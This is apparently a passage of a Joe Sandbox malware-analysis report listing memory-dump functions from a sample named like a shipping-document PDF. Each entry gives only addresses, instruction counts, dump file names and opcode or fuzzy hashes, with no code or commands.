Opcode Fuzzy Hash: 0ba65a1b51581911c4e9f487c33e65c884f127cccf351abb80d96c3c3cf45aec
Instruction Fuzzy Hash: 5F31CC32B10308DFEF15EE68D8806ADBBF1AF48214F14446AE505E7360EB34AE42CB51

Function 04F975F4 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd02cb43fac14e385bfa53f6fcb88c60d56a15a4c6e8dad851a7810188925ea9
Instruction ID: 133820f78732a94b9102aafbb5f3f53d21c8764997e34af12381a00b542a7858
Opcode Fuzzy Hash: fd02cb43fac14e385bfa53f6fcb88c60d56a15a4c6e8dad851a7810188925ea9
Instruction Fuzzy Hash: 3231A275A14701CBEB04FF69D88466577E2FF89314F048679DC097B255EF30A84ACBA0

Function 04F97E9F Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 821d7b8376f5c2f29bd25bc47170397085aac5b4b88884e67619a52b09deab17
Instruction ID: f99f1c1a9236c9a46f0858bf69c2816b2fc6746649976cb295ca3a85757a3ea2
Opcode Fuzzy Hash: 821d7b8376f5c2f29bd25bc47170397085aac5b4b88884e67619a52b09deab17
Instruction Fuzzy Hash: B7318E75914700CBEB00FF69D8847657BE1FF89314F458679E8097B256EB31A84ACBA0

Function 04F99328 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 688411a95d370426b3e16c364cf21dc93f70ea4dfb1a66a774a8cf4772f08fde
Instruction ID: 781ce14027ca4f55b6150d7a16f89b4f2ab456d47aec32c2288d37328b1b11c3
Opcode Fuzzy Hash: 688411a95d370426b3e16c364cf21dc93f70ea4dfb1a66a774a8cf4772f08fde
Instruction Fuzzy Hash: 0741E675A0020ADFCF44DF69D88499EFBB5FF89310B14C669E918AB315E730A985CF90

Function 04F9AEC0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 604ef1766e9dcca62e49fade4f11fe916ddda1ad63f85e68e3456fff1fb3d4b7
Instruction ID: 90528b8ad42bbf5f817f08b71bc4af0ad561441bead8e445b3cf32606f82f60f
Opcode Fuzzy Hash: 604ef1766e9dcca62e49fade4f11fe916ddda1ad63f85e68e3456fff1fb3d4b7
Instruction Fuzzy Hash: D3317C76B0121A9FDF05EF64D8408DDB7B6FF89314B058669E506AB360EB31BD06CB80

Function 04F9001C Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a26d8c4a1da234d57b933ee938a1c84763017eab54390dcbb80f4a4e0a85d7c9
Instruction ID: 1d1f4e41272e64b1e95f316cffd72c37e883fba45a82515a112524df8875a95d
Opcode Fuzzy Hash: a26d8c4a1da234d57b933ee938a1c84763017eab54390dcbb80f4a4e0a85d7c9
Instruction Fuzzy Hash: 24316531C04B499FCB01AFB8C8544D9FBB0FF96300B158B9AE5596B122FB30E695CB41

Function 04F97984 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 576bdc20add2e09f53e6be968dbde4e9acf4af6c279b86f70ea9da3cac548217
Instruction ID: c4daf18a56fa7fa11631c0685520b1cec1f212604d54304fce47669f2201c5bc
Opcode Fuzzy Hash: 576bdc20add2e09f53e6be968dbde4e9acf4af6c279b86f70ea9da3cac548217
Instruction Fuzzy Hash: 222187327501008FEB149F2DD885A693BE5EF85721F1A84B9E109DF366DB75EC058790

Function 06B65190 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f44a17fa6b84d8953c238dfada3c1b3762adc8e9dc744c5f63ac3e9948ddf7e
Instruction ID: ca7dedbb427980f744f59e11b3656293439675b93631b12d8dd60c87800de71d
Opcode Fuzzy Hash: 3f44a17fa6b84d8953c238dfada3c1b3762adc8e9dc744c5f63ac3e9948ddf7e
Instruction Fuzzy Hash: 6121E271B852148FD7945FB9D82833E3AE6EB89210F14886AF607C7385CE798C12C761

Function 06B67FF8 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0e23754f3925165a2f8c0dac14298fd8453316c4ccf9c1974eab48176f031b3
Instruction ID: 9b4b5c8e87b099c0d007d1cab5183802e732089168a86a3fd09a0603b74b2905
Opcode Fuzzy Hash: c0e23754f3925165a2f8c0dac14298fd8453316c4ccf9c1974eab48176f031b3
Instruction Fuzzy Hash: B631C5B090A254CFD7918FAAD951676BBB0FF45300F0489ABF6A6DB291C3389940C7B1

Function 04F97471 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed7a34f50e465e6e821ce0acefbd5351858587b0a5430f3af21367a77e41443c
Instruction ID: 7d64b775856c320623ebbdb1e596187c0986738514ab69a2fba3014c79f8b4e1
Opcode Fuzzy Hash: ed7a34f50e465e6e821ce0acefbd5351858587b0a5430f3af21367a77e41443c
Instruction Fuzzy Hash: B5316E35A00707CFCB14EF79C4809AABBF1FB44314B544629D55997391EB35F90ACB91

Function 06B60088 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad57eced5c8697a9f959c9db5ec9e9a5901f16d354bbfc78edf3a43baac7e838
Instruction ID: 43e42acc4acc35991a783275b954217acd84d2a91bf517a987e94f6e510793d7
Opcode Fuzzy Hash: ad57eced5c8697a9f959c9db5ec9e9a5901f16d354bbfc78edf3a43baac7e838
Instruction Fuzzy Hash: 14319075A00305EFDB50EF66C994BAEBBF6FF88300F10885AF40697291CB799941CB50

Function 04F96C18 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a933c55fc54f2e7a16f41e51b9a4c0cea7ee41d92822e0910521e3541092365
Instruction ID: 58930e5f2a35d2ef80440be60ed852d94da91ee9aea5dc241cc91446f1c161ad
Opcode Fuzzy Hash: 4a933c55fc54f2e7a16f41e51b9a4c0cea7ee41d92822e0910521e3541092365
Instruction Fuzzy Hash: AB21F6357105109FDB48DB2DD898D697BE6EF89B11B2640A9F506CB372DA32EC02CB40

Function 04F955E8 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aade12454bad5f73d23271e2de826dc8d5176fd1e10f5fc27ebff5e8e9bccf22
Instruction ID: 410fbc2180f9f68844a323e705a05cbfc370b217d942c330b5b53d7557f3de86
Opcode Fuzzy Hash: aade12454bad5f73d23271e2de826dc8d5176fd1e10f5fc27ebff5e8e9bccf22
Instruction Fuzzy Hash: CA314575A01208AFEF11CF95D980BAEBBF2AF4C350F109069E904B7390CB31AD41CBA1

Function 00A7D1FC Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2085741447.0000000000A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a7d000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 625004de61ceb493a87737b2fab0b56ae0eea1b11508857012eb40312c6f1523
Instruction ID: 45e7554c4352ffe38198d094c796f57a32ac4aae07ad67c019b2a52ade358800
Opcode Fuzzy Hash: 625004de61ceb493a87737b2fab0b56ae0eea1b11508857012eb40312c6f1523
Instruction Fuzzy Hash: 8721ED72604200AFCB059F54D980B6ABF75FF88314F24C5A9E9090A256C33AD817DBA2

Function 04F90040 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 675789a81722ec694e4609698281d2467713ac2abc2d7f2d8f1fa3802fddbf90
Instruction ID: 9c619444da92d88368ce521677792290f935acc34eef8fa85241edc74ad8e43b
Opcode Fuzzy Hash: 675789a81722ec694e4609698281d2467713ac2abc2d7f2d8f1fa3802fddbf90
Instruction Fuzzy Hash: 4E31F132D10B09DECB01AF78C854499F7B1FF95340B118B9AE55967121FB30E6D5CB81

Function 06B62F4A Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 904089f8af2eea04c322d0502428dfc1bfffb1688b6f5fb79f97b80dbb6f60ae
Instruction ID: 9172b97b227120fb25021727f129bb43dc09cbc228f93291c3feb60fe346c4c0
Opcode Fuzzy Hash: 904089f8af2eea04c322d0502428dfc1bfffb1688b6f5fb79f97b80dbb6f60ae
Instruction Fuzzy Hash: 18213074A002058FCB44DF79C8908EEFBB5FF8930071185AAE905E7351EB34AE46CBA0

Function 00A8D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2085804747.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a8d000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b86da56c1039eca74073556cf4d7404936cb625a77e89b1841b3609e83f08c3c
Instruction ID: 8d77a54cd4bd9e8e5cf65cecd56b1b69bb2f0780d51c48a4f60ce0f89589f3fe
Opcode Fuzzy Hash: b86da56c1039eca74073556cf4d7404936cb625a77e89b1841b3609e83f08c3c
Instruction Fuzzy Hash: C221F271604204EFDB14EF24D984B26BF75FB88314F20C569D94A4B396C33AD807CB62

Function 00A8D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2085804747.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a8d000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b6465c25e2b9008f278bf2245534075452462266e8932f10fa4190f31be237a
Instruction ID: dff9f1a18f5be652bf14ad38159b326b1b1451f296db09845ef0e02e4ac7db2e
Opcode Fuzzy Hash: 4b6465c25e2b9008f278bf2245534075452462266e8932f10fa4190f31be237a
Instruction Fuzzy Hash: 1A210471504204EFDB05EF64D9C0F26BBA5FB88314F20CA6DE9094B2D6D33AD806CB61

Function 06B601F2 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 961c36170441c45d1d23610c2aa02c9410b027884409553d10e9eccfd41a52af
Instruction ID: 3d62476d30415a776116dec8659a1f098bedf75f460f93d069a1578ea3f7a90d
Opcode Fuzzy Hash: 961c36170441c45d1d23610c2aa02c9410b027884409553d10e9eccfd41a52af
Instruction Fuzzy Hash: 5A213870A443118FEBA9BB6BD554BBE7B52EFC0310F1088A5F913466E4CF388986C741

Function 06B62F58 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dac57e3e07167f396ac4b95972495d4cb005df8c14c07e93c1ceb2a5e2773a06
Instruction ID: 20451029af4f81c9e710d22f89d815ac87e2e068e7793af449fc2949a0051462
Opcode Fuzzy Hash: dac57e3e07167f396ac4b95972495d4cb005df8c14c07e93c1ceb2a5e2773a06
Instruction Fuzzy Hash: E4210175A002058FDF44EF69C8908AEF7B5FF89300B118569E905B7351EB34AA45CBA0

Function 04F9DE28 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5dea5bd00dcaa39c6548e9d42f50523f3cf428e771ab94cb4c8055a52687525
Instruction ID: 85ec42113c8fe7d7d79a2bab74d6787f9186daaadc90735a645f17514ed3cf98
Opcode Fuzzy Hash: d5dea5bd00dcaa39c6548e9d42f50523f3cf428e771ab94cb4c8055a52687525
Instruction Fuzzy Hash: D7214F32E106099FDB10EF68D94059AFBF5FF59311B50C26AE958A7200EB30E999CB91

Function 06B64BE8 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7695b1d2c9920a1239f934d60d7295c9b6a22ce6e38020afb3fb443b9538d5fe
Instruction ID: bdd3d3c3d21a1448910dfefeaf80e43720b47e5757c3054e32741141de19e1e5
Opcode Fuzzy Hash: 7695b1d2c9920a1239f934d60d7295c9b6a22ce6e38020afb3fb443b9538d5fe
Instruction Fuzzy Hash: 8B1157B310D3918FE37646299C4022A7FA5AB06211B0640D7F195CB193C56DC961C3A2

Function 04F91B40 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3356889389462e77c46f70eb7bca8bdfd5f04ab38901a0843723f194f5360a06
Instruction ID: 09f5c916883abcae0cf8721ae7b8e383a03775d5813ece8541a3d5a8c9a0895c
Opcode Fuzzy Hash: 3356889389462e77c46f70eb7bca8bdfd5f04ab38901a0843723f194f5360a06
Instruction Fuzzy Hash: 16119D75A043864FAB12DF798D504FBBBF6AFC62207288969D459D7242DA309D06C760

Function 06B63670 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 158f250f1ac3ab653044e1c3c151e239c78724c20dadf7bf3b29a3d9814c9ff5
Instruction ID: 4bbf0a80b51bcfc64727adebd274a7f2806bbc677c40f3ac119baab4ef72d0da
Opcode Fuzzy Hash: 158f250f1ac3ab653044e1c3c151e239c78724c20dadf7bf3b29a3d9814c9ff5
Instruction Fuzzy Hash: 9F210A72E0425A8FCF11DFA9DC114EEBBB1EF49310F01816AEA55B7241EB345A14CBE0

Function 06B60258 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffb0d38da16ca935b6dfb4952e5da41605ac2a67ce1eeb8988fd24d4a5edc11a
Instruction ID: d2167053b3ce6d9b9753387b437685ca374c21a3da41afc616cadbbefacb6fd9
Opcode Fuzzy Hash: ffb0d38da16ca935b6dfb4952e5da41605ac2a67ce1eeb8988fd24d4a5edc11a
Instruction Fuzzy Hash: 5011E970A403018BE3A9EA2BE644B6FB79BEFC0311F04883AE55746678CF79D885C740

Function 06B68188 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d56ed776524c26cbfe64ef5130d2556e08d52aba3a81d66d40f4c41e956d80c
Instruction ID: 13fb6a389fd67169d83c517d03dd1f33b8c535fcf9f26ac834416052f2553f00
Opcode Fuzzy Hash: 2d56ed776524c26cbfe64ef5130d2556e08d52aba3a81d66d40f4c41e956d80c
Instruction Fuzzy Hash: F221A4B1A04629CFE7944FAECD4066ABBB4FF49301F0041A7F226A6181D2389954C7A1

Function 04F917F8 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f166777589c0c13234095025406d0783f74ae1bb3d1b1845550b4b356f72720
Instruction ID: 584ef31b2fe8dd373dabe410fdab5fbce59c58432bbd91a66c97cc94cdb2f677
Opcode Fuzzy Hash: 7f166777589c0c13234095025406d0783f74ae1bb3d1b1845550b4b356f72720
Instruction Fuzzy Hash: B631E3B0D01249DFEB24DF9AC584B9EBFF4AB08314F24802AE405BB340C7756845CFA1

Function 04F91D06 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7fe5ead598afa6b5108f636741e896d19f82b234fcba4bdad9b851bdb7404e9
Instruction ID: ff113481725d3ef6c0c7ae2dd6ee21b5aace294fc2c52286d43249563c65aa16
Opcode Fuzzy Hash: d7fe5ead598afa6b5108f636741e896d19f82b234fcba4bdad9b851bdb7404e9
Instruction Fuzzy Hash: AF31E3B4D01249DFEB20DF99C585BDEBFF5AB48714F24806AE404AB240C7795846CFA0

Function 04F93F58 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1d4e65d128de53cd149b9903541334bc9f8fed65e18635c03a3fd0554724538
Instruction ID: 3d520fe0c1a18bac45f17f8a94468b44a14dd860466665ff50659204975e8271
Opcode Fuzzy Hash: f1d4e65d128de53cd149b9903541334bc9f8fed65e18635c03a3fd0554724538
Instruction Fuzzy Hash: 9D11C1313046101BFB186A68D8167AE32D79BCCB04F00402EE8479B7D6CFA5BC0343D6

Function 04F99839 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b55aa279e28eb607f608040e86391830e209012b2e01e0417076792917fe33e1
Instruction ID: 2c880da66ff0fcddf993273bf3d3a5f5a17ea82f8dd9df7a56a35e46592e8932
Opcode Fuzzy Hash: b55aa279e28eb607f608040e86391830e209012b2e01e0417076792917fe33e1
Instruction Fuzzy Hash: E5112B71F097505FCB1A86199840E6ABBDB9F8570135E41BFE405DB761CA64EC0287D0

Function 06B68179 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58fd057fe070ff40b11621efe4f16b833a5debc6805e9a9661ad763fdacb1c19
Instruction ID: 8603380ddfdc5c63476296882f898cdd73bbb22aa78a046fadad69c025785311
Opcode Fuzzy Hash: 58fd057fe070ff40b11621efe4f16b833a5debc6805e9a9661ad763fdacb1c19
Instruction Fuzzy Hash: 88117FB19046298FE7948FAEDD8166AB7B5FF88301F004176B226A6281D3389954C7E2

Function 00A8D006 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2085804747.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a8d000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ef9072c1f067446e975614d9b04cfd77452bd7dbcd2c4aefa9303e5c6adbbcd
Instruction ID: 9347a9dbb29763b3ba3c72f72926658bfa2eadcdb5a86908eaa26b8403435987
Opcode Fuzzy Hash: 4ef9072c1f067446e975614d9b04cfd77452bd7dbcd2c4aefa9303e5c6adbbcd
Instruction Fuzzy Hash: 782192755083809FDB02DF14D994711BF71FB46314F28C5DAD8498F2A7C33A980ACB62

Function 04F97DC8 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eea48b2420923551dbe7120262a285b69ebbecb125313450eaabb6b8b19f68aa
Instruction ID: 36c2d39c94fd1b17cda0ec680aa64e5badec16a724aeb2ded8bdf7eb5bbfccf1
Opcode Fuzzy Hash: eea48b2420923551dbe7120262a285b69ebbecb125313450eaabb6b8b19f68aa
Instruction Fuzzy Hash: EF218E31500741CFDB65FB38C840AAABBF6EF85314F0489ACD09A1B264CF31A88BCB41

Function 06B6FA80 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e721e0f7597899eaf37cac6e091b020f014760f8e5c05d488f9913ec1f56cdc9
Instruction ID: 291c0a8533b2f1bc657c879033c37ae715828fdb7a3d5226033cd222d040d60c
Opcode Fuzzy Hash: e721e0f7597899eaf37cac6e091b020f014760f8e5c05d488f9913ec1f56cdc9
Instruction Fuzzy Hash: 2C11A3B0F002188FDB589E7AA91077F7AABFF84710F148569F80A97341EA389D01C7D0

Function 04F93F68 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 119af196a642f7a0fbb8a4f60766d5da8990f954c99fe5c34aef200b267e012c
Instruction ID: 3dab9ab23c04c7b3dbee89b2847dcaad9a0f07a5eb5b2be246098b076c4e47b2
Opcode Fuzzy Hash: 119af196a642f7a0fbb8a4f60766d5da8990f954c99fe5c34aef200b267e012c
Instruction Fuzzy Hash: D01170303146105BFB187A6999257AE32D79BCCB04F00402EE9479B7D6CFA5AC4347D6

Function 04F99A88 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33e0ad1862efc17e4544a9f1d17b14ff96f4985f5420816dca22e2cfd039e17e
Instruction ID: 50641b5f2aa4717ccb660c7941de68f8d6646b83ce655f69ecc1629e56492296
Opcode Fuzzy Hash: 33e0ad1862efc17e4544a9f1d17b14ff96f4985f5420816dca22e2cfd039e17e
Instruction Fuzzy Hash: 4B11C8373501114BEB149E1DCC85F693BD6EFC5311F1A8079E009CB366DA79ED058790

Function 04F95FFC Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

